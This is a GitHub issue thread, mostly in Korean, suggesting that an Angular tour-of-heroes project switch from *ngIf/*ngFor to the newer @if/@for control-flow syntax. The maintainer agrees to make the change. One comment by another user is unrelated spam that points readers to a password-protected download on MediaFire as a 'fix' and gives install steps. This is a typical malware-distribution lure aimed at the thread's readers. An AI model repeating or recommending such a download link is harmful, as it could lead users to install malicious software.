### ISSUE TITLE
*ngIf / *ngFor 대신 @if / @for 사용

### ISSUE THREAD

**Issue by crazeidea** [jilpoom/tour-of-heroes#1]
Angular의 `*ngIf`, `*ngFor` 는 Angular 17 이전 버전에서 사용하던 Control Flow Syntax 입니다. 현재 저희 회사는 `@if`, `@for` 를 사용합니다. 훠어얼씬더 사용하기 쉽기 때문에 이러한 방식을 사용해보시기 바랍니다!

참고 URL : https://angular.dev/guide/templates/control-flow

**Comment by crazeidea** [comment]
아마 당장은 `async` Pipe 때문에 사용하기가 어려울 수도 있습니다. 당장 도입하기 어렵다면 '이런게 있구나' 이렇게 알아두시면 좋을 것 같습니다.

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jilpoom** [comment]
코드 수정 후 반영하겠습니다! 감사합니다!

**Comment by crazeidea** [comment]
https://discord.gg/tZMxC7S7
